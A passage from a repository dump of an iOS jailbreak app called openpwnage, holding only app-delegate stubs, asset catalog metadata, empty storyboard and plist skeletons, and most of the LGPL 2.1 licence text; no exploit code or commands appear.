when the app becomes active. */ - (void)applicationDidBecomeActive:(UIApplication *)application { 40 | return; 41 | } 42 | 43 | 44 | /* Intentionally empty: no cleanup is done at termination. */ - (void)applicationWillTerminate:(UIApplication *)application { 45 | return; 46 | } 47 | 48 | @end 49 | -------------------------------------------------------------------------------- /openpwnage/Assets.xcassets/AccentColor.colorset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "colors" : [ 3 | { 4 | "idiom" : "universal" 5 | } 6 | ], 7 | "info" : { 8 | "author" : "xcode", 9 | "version" : 1 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /openpwnage/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "openpwnagebeta7 (6).png", 5 | "idiom" : "iphone", 6 | "scale" : "2x", 7 | "size" : "20x20" 8 | }, 9 | { 10 | "filename" : "openpwnagebeta7 (7).png", 11 | "idiom" : "iphone", 12 | "scale" : "3x", 13 | "size" : "20x20" 14 | }, 15 | { 16 | "filename" : "openpwnagebeta7 (3).png", 17 | "idiom" : "iphone", 18 | "scale" : "2x", 19 | "size" : "29x29" 20 | }, 21 | { 22 | "filename" : "openpwnagebeta7 (11).png", 23 | "idiom" : "iphone", 24 | "scale" : "3x", 25 | "size" : "29x29" 26 | }, 27 | { 28 | "filename" :
"openpwnagebeta7 (8)-1.png", 29 | "idiom" : "iphone", 30 | "scale" : "2x", 31 | "size" : "40x40" 32 | }, 33 | { 34 | "filename" : "openpwnagebeta7 (1).png", 35 | "idiom" : "iphone", 36 | "scale" : "3x", 37 | "size" : "40x40" 38 | }, 39 | { 40 | "filename" : "openpwnagebeta7 (1)-1.png", 41 | "idiom" : "iphone", 42 | "scale" : "2x", 43 | "size" : "60x60" 44 | }, 45 | { 46 | "filename" : "openpwnagebeta7 (2).png", 47 | "idiom" : "iphone", 48 | "scale" : "3x", 49 | "size" : "60x60" 50 | }, 51 | { 52 | "filename" : "openpwnagebeta7 (4).png", 53 | "idiom" : "ipad", 54 | "scale" : "1x", 55 | "size" : "20x20" 56 | }, 57 | { 58 | "filename" : "openpwnagebeta7 (6)-1.png", 59 | "idiom" : "ipad", 60 | "scale" : "2x", 61 | "size" : "20x20" 62 | }, 63 | { 64 | "filename" : "openpwnagebeta7 (5).png", 65 | "idiom" : "ipad", 66 | "scale" : "1x", 67 | "size" : "29x29" 68 | }, 69 | { 70 | "filename" : "openpwnagebeta7 (3)-1.png", 71 | "idiom" : "ipad", 72 | "scale" : "2x", 73 | "size" : "29x29" 74 | }, 75 | { 76 | "filename" : "openpwnagebeta7 (6)-2.png", 77 | "idiom" : "ipad", 78 | "scale" : "1x", 79 | "size" : "40x40" 80 | }, 81 | { 82 | "filename" : "openpwnagebeta7 (8).png", 83 | "idiom" : "ipad", 84 | "scale" : "2x", 85 | "size" : "40x40" 86 | }, 87 | { 88 | "filename" : "openpwnagebeta7 (9).png", 89 | "idiom" : "ipad", 90 | "scale" : "1x", 91 | "size" : "76x76" 92 | }, 93 | { 94 | "filename" : "openpwnagebeta7 (10).png", 95 | "idiom" : "ipad", 96 | "scale" : "2x", 97 | "size" : "76x76" 98 | }, 99 | { 100 | "idiom" : "ipad", 101 | "scale" : "2x", 102 | "size" : "83.5x83.5" 103 | }, 104 | { 105 | "idiom" : "ios-marketing", 106 | "scale" : "1x", 107 | "size" : "1024x1024" 108 | } 109 | ], 110 | "info" : { 111 | "author" : "xcode", 112 | "version" : 1 113 | } 114 | } 115 | -------------------------------------------------------------------------------- /openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (1)-1.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (1)-1.png -------------------------------------------------------------------------------- /openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (1).png -------------------------------------------------------------------------------- /openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (10).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (10).png -------------------------------------------------------------------------------- /openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (11).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (11).png -------------------------------------------------------------------------------- /openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (2).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (2).png -------------------------------------------------------------------------------- /openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (3)-1.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (3)-1.png -------------------------------------------------------------------------------- /openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (3).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (3).png -------------------------------------------------------------------------------- /openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (4).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (4).png -------------------------------------------------------------------------------- /openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (5).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (5).png -------------------------------------------------------------------------------- /openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (6)-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (6)-1.png -------------------------------------------------------------------------------- /openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (6)-2.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (6)-2.png -------------------------------------------------------------------------------- /openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (6).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (6).png -------------------------------------------------------------------------------- /openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (7).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (7).png -------------------------------------------------------------------------------- /openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (8)-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (8)-1.png -------------------------------------------------------------------------------- /openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (8).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (8).png -------------------------------------------------------------------------------- /openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (9).png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/AppIcon.appiconset/openpwnagebeta7 (9).png -------------------------------------------------------------------------------- /openpwnage/Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /openpwnage/Assets.xcassets/openpwnageB7JailbreakButtonopenpwnageB7JailbreakButton.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "openpwnageB7JailbreakButtonopenpwnageB7JailbreakButton (3).png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "idiom" : "universal", 10 | "scale" : "2x" 11 | }, 12 | { 13 | "idiom" : "universal", 14 | "scale" : "3x" 15 | } 16 | ], 17 | "info" : { 18 | "author" : "xcode", 19 | "version" : 1 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /openpwnage/Assets.xcassets/openpwnageB7JailbreakButtonopenpwnageB7JailbreakButton.imageset/openpwnageB7JailbreakButtonopenpwnageB7JailbreakButton (3).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/openpwnageB7JailbreakButtonopenpwnageB7JailbreakButton.imageset/openpwnageB7JailbreakButtonopenpwnageB7JailbreakButton (3).png -------------------------------------------------------------------------------- /openpwnage/Assets.xcassets/openpwnageB7JailbreakingButtonopenpwnageB7JailbreakingButton.imageset/Contents.json: 
-------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "openpwnageB7JailbreakButtonopenpwnageB7JailbreakButton (4).png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "idiom" : "universal", 10 | "scale" : "2x" 11 | }, 12 | { 13 | "idiom" : "universal", 14 | "scale" : "3x" 15 | } 16 | ], 17 | "info" : { 18 | "author" : "xcode", 19 | "version" : 1 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /openpwnage/Assets.xcassets/openpwnageB7JailbreakingButtonopenpwnageB7JailbreakingButton.imageset/openpwnageB7JailbreakButtonopenpwnageB7JailbreakButton (4).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/Assets.xcassets/openpwnageB7JailbreakingButtonopenpwnageB7JailbreakingButton.imageset/openpwnageB7JailbreakButtonopenpwnageB7JailbreakButton (4).png -------------------------------------------------------------------------------- /openpwnage/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /openpwnage/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 30 | 31 | 32 | 33 | 34 | It seems as if the console/log view has failed to load... no idea why this could be the case. If this happens likely something is seriously wrong and I would recommend not proceeding further. 
This jailbreak is currently at this point in time not meant to be used by regular users / the general public. If anything breaks, well, I warned you :/. 35 | 36 | 37 | 38 | 39 | 46 | 53 | 61 | 71 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 115 | 122 | 129 | 136 | 143 | 150 | 157 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 192 | 203 | 210 | 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 | 221 | 222 | 223 | 224 | 225 | 226 | 227 | 228 | 229 | 230 | 231 | 232 | 233 | 234 | 235 | -------------------------------------------------------------------------------- /openpwnage/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | UIApplicationSceneManifest 6 | 7 | UIApplicationSupportsMultipleScenes 8 | 9 | UISceneConfigurations 10 | 11 | UIWindowSceneSessionRoleApplication 12 | 13 | 14 | UISceneConfigurationName 15 | Default Configuration 16 | UISceneDelegateClassName 17 | SceneDelegate 18 | UISceneStoryboardFile 19 | Main 20 | 21 | 22 | 23 | 24 | UIFileSharingEnabled 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /openpwnage/LGPL/LICENSE: -------------------------------------------------------------------------------- 1 | GNU LESSER GENERAL PUBLIC LICENSE 2 | Version 2.1, February 1999 3 | 4 | Copyright (C) 1991, 1999 Free Software Foundation, Inc. 5 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 6 | Everyone is permitted to copy and distribute verbatim copies 7 | of this license document, but changing it is not allowed. 8 | 9 | [This is the first released version of the Lesser GPL. It also counts 10 | as the successor of the GNU Library Public License, version 2, hence 11 | the version number 2.1.] 
12 | 13 | Preamble 14 | 15 | The licenses for most software are designed to take away your 16 | freedom to share and change it. By contrast, the GNU General Public 17 | Licenses are intended to guarantee your freedom to share and change 18 | free software--to make sure the software is free for all its users. 19 | 20 | This license, the Lesser General Public License, applies to some 21 | specially designated software packages--typically libraries--of the 22 | Free Software Foundation and other authors who decide to use it. You 23 | can use it too, but we suggest you first think carefully about whether 24 | this license or the ordinary General Public License is the better 25 | strategy to use in any particular case, based on the explanations below. 26 | 27 | When we speak of free software, we are referring to freedom of use, 28 | not price. Our General Public Licenses are designed to make sure that 29 | you have the freedom to distribute copies of free software (and charge 30 | for this service if you wish); that you receive source code or can get 31 | it if you want it; that you can change the software and use pieces of 32 | it in new free programs; and that you are informed that you can do 33 | these things. 34 | 35 | To protect your rights, we need to make restrictions that forbid 36 | distributors to deny you these rights or to ask you to surrender these 37 | rights. These restrictions translate to certain responsibilities for 38 | you if you distribute copies of the library or if you modify it. 39 | 40 | For example, if you distribute copies of the library, whether gratis 41 | or for a fee, you must give the recipients all the rights that we gave 42 | you. You must make sure that they, too, receive or can get the source 43 | code. If you link other code with the library, you must provide 44 | complete object files to the recipients, so that they can relink them 45 | with the library after making changes to the library and recompiling 46 | it. 
And you must show them these terms so they know their rights. 47 | 48 | We protect your rights with a two-step method: (1) we copyright the 49 | library, and (2) we offer you this license, which gives you legal 50 | permission to copy, distribute and/or modify the library. 51 | 52 | To protect each distributor, we want to make it very clear that 53 | there is no warranty for the free library. Also, if the library is 54 | modified by someone else and passed on, the recipients should know 55 | that what they have is not the original version, so that the original 56 | author's reputation will not be affected by problems that might be 57 | introduced by others. 58 | 59 | Finally, software patents pose a constant threat to the existence of 60 | any free program. We wish to make sure that a company cannot 61 | effectively restrict the users of a free program by obtaining a 62 | restrictive license from a patent holder. Therefore, we insist that 63 | any patent license obtained for a version of the library must be 64 | consistent with the full freedom of use specified in this license. 65 | 66 | Most GNU software, including some libraries, is covered by the 67 | ordinary GNU General Public License. This license, the GNU Lesser 68 | General Public License, applies to certain designated libraries, and 69 | is quite different from the ordinary General Public License. We use 70 | this license for certain libraries in order to permit linking those 71 | libraries into non-free programs. 72 | 73 | When a program is linked with a library, whether statically or using 74 | a shared library, the combination of the two is legally speaking a 75 | combined work, a derivative of the original library. The ordinary 76 | General Public License therefore permits such linking only if the 77 | entire combination fits its criteria of freedom. The Lesser General 78 | Public License permits more lax criteria for linking other code with 79 | the library. 
80 | 81 | We call this license the "Lesser" General Public License because it 82 | does Less to protect the user's freedom than the ordinary General 83 | Public License. It also provides other free software developers Less 84 | of an advantage over competing non-free programs. These disadvantages 85 | are the reason we use the ordinary General Public License for many 86 | libraries. However, the Lesser license provides advantages in certain 87 | special circumstances. 88 | 89 | For example, on rare occasions, there may be a special need to 90 | encourage the widest possible use of a certain library, so that it becomes 91 | a de-facto standard. To achieve this, non-free programs must be 92 | allowed to use the library. A more frequent case is that a free 93 | library does the same job as widely used non-free libraries. In this 94 | case, there is little to gain by limiting the free library to free 95 | software only, so we use the Lesser General Public License. 96 | 97 | In other cases, permission to use a particular library in non-free 98 | programs enables a greater number of people to use a large body of 99 | free software. For example, permission to use the GNU C Library in 100 | non-free programs enables many more people to use the whole GNU 101 | operating system, as well as its variant, the GNU/Linux operating 102 | system. 103 | 104 | Although the Lesser General Public License is Less protective of the 105 | users' freedom, it does ensure that the user of a program that is 106 | linked with the Library has the freedom and the wherewithal to run 107 | that program using a modified version of the Library. 108 | 109 | The precise terms and conditions for copying, distribution and 110 | modification follow. Pay close attention to the difference between a 111 | "work based on the library" and a "work that uses the library". The 112 | former contains code derived from the library, whereas the latter must 113 | be combined with the library in order to run. 
114 | 115 | GNU LESSER GENERAL PUBLIC LICENSE 116 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 117 | 118 | 0. This License Agreement applies to any software library or other 119 | program which contains a notice placed by the copyright holder or 120 | other authorized party saying it may be distributed under the terms of 121 | this Lesser General Public License (also called "this License"). 122 | Each licensee is addressed as "you". 123 | 124 | A "library" means a collection of software functions and/or data 125 | prepared so as to be conveniently linked with application programs 126 | (which use some of those functions and data) to form executables. 127 | 128 | The "Library", below, refers to any such software library or work 129 | which has been distributed under these terms. A "work based on the 130 | Library" means either the Library or any derivative work under 131 | copyright law: that is to say, a work containing the Library or a 132 | portion of it, either verbatim or with modifications and/or translated 133 | straightforwardly into another language. (Hereinafter, translation is 134 | included without limitation in the term "modification".) 135 | 136 | "Source code" for a work means the preferred form of the work for 137 | making modifications to it. For a library, complete source code means 138 | all the source code for all modules it contains, plus any associated 139 | interface definition files, plus the scripts used to control compilation 140 | and installation of the library. 141 | 142 | Activities other than copying, distribution and modification are not 143 | covered by this License; they are outside its scope. The act of 144 | running a program using the Library is not restricted, and output from 145 | such a program is covered only if its contents constitute a work based 146 | on the Library (independent of the use of the Library in a tool for 147 | writing it). 
Whether that is true depends on what the Library does 148 | and what the program that uses the Library does. 149 | 150 | 1. You may copy and distribute verbatim copies of the Library's 151 | complete source code as you receive it, in any medium, provided that 152 | you conspicuously and appropriately publish on each copy an 153 | appropriate copyright notice and disclaimer of warranty; keep intact 154 | all the notices that refer to this License and to the absence of any 155 | warranty; and distribute a copy of this License along with the 156 | Library. 157 | 158 | You may charge a fee for the physical act of transferring a copy, 159 | and you may at your option offer warranty protection in exchange for a 160 | fee. 161 | 162 | 2. You may modify your copy or copies of the Library or any portion 163 | of it, thus forming a work based on the Library, and copy and 164 | distribute such modifications or work under the terms of Section 1 165 | above, provided that you also meet all of these conditions: 166 | 167 | a) The modified work must itself be a software library. 168 | 169 | b) You must cause the files modified to carry prominent notices 170 | stating that you changed the files and the date of any change. 171 | 172 | c) You must cause the whole of the work to be licensed at no 173 | charge to all third parties under the terms of this License. 174 | 175 | d) If a facility in the modified Library refers to a function or a 176 | table of data to be supplied by an application program that uses 177 | the facility, other than as an argument passed when the facility 178 | is invoked, then you must make a good faith effort to ensure that, 179 | in the event an application does not supply such function or 180 | table, the facility still operates, and performs whatever part of 181 | its purpose remains meaningful. 182 | 183 | (For example, a function in a library to compute square roots has 184 | a purpose that is entirely well-defined independent of the 185 | application. 
Therefore, Subsection 2d requires that any 186 | application-supplied function or table used by this function must 187 | be optional: if the application does not supply it, the square 188 | root function must still compute square roots.) 189 | 190 | These requirements apply to the modified work as a whole. If 191 | identifiable sections of that work are not derived from the Library, 192 | and can be reasonably considered independent and separate works in 193 | themselves, then this License, and its terms, do not apply to those 194 | sections when you distribute them as separate works. But when you 195 | distribute the same sections as part of a whole which is a work based 196 | on the Library, the distribution of the whole must be on the terms of 197 | this License, whose permissions for other licensees extend to the 198 | entire whole, and thus to each and every part regardless of who wrote 199 | it. 200 | 201 | Thus, it is not the intent of this section to claim rights or contest 202 | your rights to work written entirely by you; rather, the intent is to 203 | exercise the right to control the distribution of derivative or 204 | collective works based on the Library. 205 | 206 | In addition, mere aggregation of another work not based on the Library 207 | with the Library (or with a work based on the Library) on a volume of 208 | a storage or distribution medium does not bring the other work under 209 | the scope of this License. 210 | 211 | 3. You may opt to apply the terms of the ordinary GNU General Public 212 | License instead of this License to a given copy of the Library. To do 213 | this, you must alter all the notices that refer to this License, so 214 | that they refer to the ordinary GNU General Public License, version 2, 215 | instead of to this License. (If a newer version than version 2 of the 216 | ordinary GNU General Public License has appeared, then you can specify 217 | that version instead if you wish.) 
Do not make any other change in 218 | these notices. 219 | 220 | Once this change is made in a given copy, it is irreversible for 221 | that copy, so the ordinary GNU General Public License applies to all 222 | subsequent copies and derivative works made from that copy. 223 | 224 | This option is useful when you wish to copy part of the code of 225 | the Library into a program that is not a library. 226 | 227 | 4. You may copy and distribute the Library (or a portion or 228 | derivative of it, under Section 2) in object code or executable form 229 | under the terms of Sections 1 and 2 above provided that you accompany 230 | it with the complete corresponding machine-readable source code, which 231 | must be distributed under the terms of Sections 1 and 2 above on a 232 | medium customarily used for software interchange. 233 | 234 | If distribution of object code is made by offering access to copy 235 | from a designated place, then offering equivalent access to copy the 236 | source code from the same place satisfies the requirement to 237 | distribute the source code, even though third parties are not 238 | compelled to copy the source along with the object code. 239 | 240 | 5. A program that contains no derivative of any portion of the 241 | Library, but is designed to work with the Library by being compiled or 242 | linked with it, is called a "work that uses the Library". Such a 243 | work, in isolation, is not a derivative work of the Library, and 244 | therefore falls outside the scope of this License. 245 | 246 | However, linking a "work that uses the Library" with the Library 247 | creates an executable that is a derivative of the Library (because it 248 | contains portions of the Library), rather than a "work that uses the 249 | library". The executable is therefore covered by this License. 250 | Section 6 states terms for distribution of such executables. 
251 | 252 | When a "work that uses the Library" uses material from a header file 253 | that is part of the Library, the object code for the work may be a 254 | derivative work of the Library even though the source code is not. 255 | Whether this is true is especially significant if the work can be 256 | linked without the Library, or if the work is itself a library. The 257 | threshold for this to be true is not precisely defined by law. 258 | 259 | If such an object file uses only numerical parameters, data 260 | structure layouts and accessors, and small macros and small inline 261 | functions (ten lines or less in length), then the use of the object 262 | file is unrestricted, regardless of whether it is legally a derivative 263 | work. (Executables containing this object code plus portions of the 264 | Library will still fall under Section 6.) 265 | 266 | Otherwise, if the work is a derivative of the Library, you may 267 | distribute the object code for the work under the terms of Section 6. 268 | Any executables containing that work also fall under Section 6, 269 | whether or not they are linked directly with the Library itself. 270 | 271 | 6. As an exception to the Sections above, you may also combine or 272 | link a "work that uses the Library" with the Library to produce a 273 | work containing portions of the Library, and distribute that work 274 | under terms of your choice, provided that the terms permit 275 | modification of the work for the customer's own use and reverse 276 | engineering for debugging such modifications. 277 | 278 | You must give prominent notice with each copy of the work that the 279 | Library is used in it and that the Library and its use are covered by 280 | this License. You must supply a copy of this License. If the work 281 | during execution displays copyright notices, you must include the 282 | copyright notice for the Library among them, as well as a reference 283 | directing the user to the copy of this License. 
Also, you must do one 284 | of these things: 285 | 286 | a) Accompany the work with the complete corresponding 287 | machine-readable source code for the Library including whatever 288 | changes were used in the work (which must be distributed under 289 | Sections 1 and 2 above); and, if the work is an executable linked 290 | with the Library, with the complete machine-readable "work that 291 | uses the Library", as object code and/or source code, so that the 292 | user can modify the Library and then relink to produce a modified 293 | executable containing the modified Library. (It is understood 294 | that the user who changes the contents of definitions files in the 295 | Library will not necessarily be able to recompile the application 296 | to use the modified definitions.) 297 | 298 | b) Use a suitable shared library mechanism for linking with the 299 | Library. A suitable mechanism is one that (1) uses at run time a 300 | copy of the library already present on the user's computer system, 301 | rather than copying library functions into the executable, and (2) 302 | will operate properly with a modified version of the library, if 303 | the user installs one, as long as the modified version is 304 | interface-compatible with the version that the work was made with. 305 | 306 | c) Accompany the work with a written offer, valid for at 307 | least three years, to give the same user the materials 308 | specified in Subsection 6a, above, for a charge no more 309 | than the cost of performing this distribution. 310 | 311 | d) If distribution of the work is made by offering access to copy 312 | from a designated place, offer equivalent access to copy the above 313 | specified materials from the same place. 314 | 315 | e) Verify that the user has already received a copy of these 316 | materials or that you have already sent this user a copy. 
317 | 318 | For an executable, the required form of the "work that uses the 319 | Library" must include any data and utility programs needed for 320 | reproducing the executable from it. However, as a special exception, 321 | the materials to be distributed need not include anything that is 322 | normally distributed (in either source or binary form) with the major 323 | components (compiler, kernel, and so on) of the operating system on 324 | which the executable runs, unless that component itself accompanies 325 | the executable. 326 | 327 | It may happen that this requirement contradicts the license 328 | restrictions of other proprietary libraries that do not normally 329 | accompany the operating system. Such a contradiction means you cannot 330 | use both them and the Library together in an executable that you 331 | distribute. 332 | 333 | 7. You may place library facilities that are a work based on the 334 | Library side-by-side in a single library together with other library 335 | facilities not covered by this License, and distribute such a combined 336 | library, provided that the separate distribution of the work based on 337 | the Library and of the other library facilities is otherwise 338 | permitted, and provided that you do these two things: 339 | 340 | a) Accompany the combined library with a copy of the same work 341 | based on the Library, uncombined with any other library 342 | facilities. This must be distributed under the terms of the 343 | Sections above. 344 | 345 | b) Give prominent notice with the combined library of the fact 346 | that part of it is a work based on the Library, and explaining 347 | where to find the accompanying uncombined form of the same work. 348 | 349 | 8. You may not copy, modify, sublicense, link with, or distribute 350 | the Library except as expressly provided under this License. 
Any 351 | attempt otherwise to copy, modify, sublicense, link with, or 352 | distribute the Library is void, and will automatically terminate your 353 | rights under this License. However, parties who have received copies, 354 | or rights, from you under this License will not have their licenses 355 | terminated so long as such parties remain in full compliance. 356 | 357 | 9. You are not required to accept this License, since you have not 358 | signed it. However, nothing else grants you permission to modify or 359 | distribute the Library or its derivative works. These actions are 360 | prohibited by law if you do not accept this License. Therefore, by 361 | modifying or distributing the Library (or any work based on the 362 | Library), you indicate your acceptance of this License to do so, and 363 | all its terms and conditions for copying, distributing or modifying 364 | the Library or works based on it. 365 | 366 | 10. Each time you redistribute the Library (or any work based on the 367 | Library), the recipient automatically receives a license from the 368 | original licensor to copy, distribute, link with or modify the Library 369 | subject to these terms and conditions. You may not impose any further 370 | restrictions on the recipients' exercise of the rights granted herein. 371 | You are not responsible for enforcing compliance by third parties with 372 | this License. 373 | 374 | 11. If, as a consequence of a court judgment or allegation of patent 375 | infringement or for any other reason (not limited to patent issues), 376 | conditions are imposed on you (whether by court order, agreement or 377 | otherwise) that contradict the conditions of this License, they do not 378 | excuse you from the conditions of this License. If you cannot 379 | distribute so as to satisfy simultaneously your obligations under this 380 | License and any other pertinent obligations, then as a consequence you 381 | may not distribute the Library at all. 
For example, if a patent 382 | license would not permit royalty-free redistribution of the Library by 383 | all those who receive copies directly or indirectly through you, then 384 | the only way you could satisfy both it and this License would be to 385 | refrain entirely from distribution of the Library. 386 | 387 | If any portion of this section is held invalid or unenforceable under any 388 | particular circumstance, the balance of the section is intended to apply, 389 | and the section as a whole is intended to apply in other circumstances. 390 | 391 | It is not the purpose of this section to induce you to infringe any 392 | patents or other property right claims or to contest validity of any 393 | such claims; this section has the sole purpose of protecting the 394 | integrity of the free software distribution system which is 395 | implemented by public license practices. Many people have made 396 | generous contributions to the wide range of software distributed 397 | through that system in reliance on consistent application of that 398 | system; it is up to the author/donor to decide if he or she is willing 399 | to distribute software through any other system and a licensee cannot 400 | impose that choice. 401 | 402 | This section is intended to make thoroughly clear what is believed to 403 | be a consequence of the rest of this License. 404 | 405 | 12. If the distribution and/or use of the Library is restricted in 406 | certain countries either by patents or by copyrighted interfaces, the 407 | original copyright holder who places the Library under this License may add 408 | an explicit geographical distribution limitation excluding those countries, 409 | so that distribution is permitted only in or among countries not thus 410 | excluded. In such case, this License incorporates the limitation as if 411 | written in the body of this License. 412 | 413 | 13. 
The Free Software Foundation may publish revised and/or new 414 | versions of the Lesser General Public License from time to time. 415 | Such new versions will be similar in spirit to the present version, 416 | but may differ in detail to address new problems or concerns. 417 | 418 | Each version is given a distinguishing version number. If the Library 419 | specifies a version number of this License which applies to it and 420 | "any later version", you have the option of following the terms and 421 | conditions either of that version or of any later version published by 422 | the Free Software Foundation. If the Library does not specify a 423 | license version number, you may choose any version ever published by 424 | the Free Software Foundation. 425 | 426 | 14. If you wish to incorporate parts of the Library into other free 427 | programs whose distribution conditions are incompatible with these, 428 | write to the author to ask for permission. For software which is 429 | copyrighted by the Free Software Foundation, write to the Free 430 | Software Foundation; we sometimes make exceptions for this. Our 431 | decision will be guided by the two goals of preserving the free status 432 | of all derivatives of our free software and of promoting the sharing 433 | and reuse of software generally. 434 | 435 | NO WARRANTY 436 | 437 | 15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO 438 | WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW. 439 | EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR 440 | OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY 441 | KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE 442 | IMPLIED WARRANTIES OF 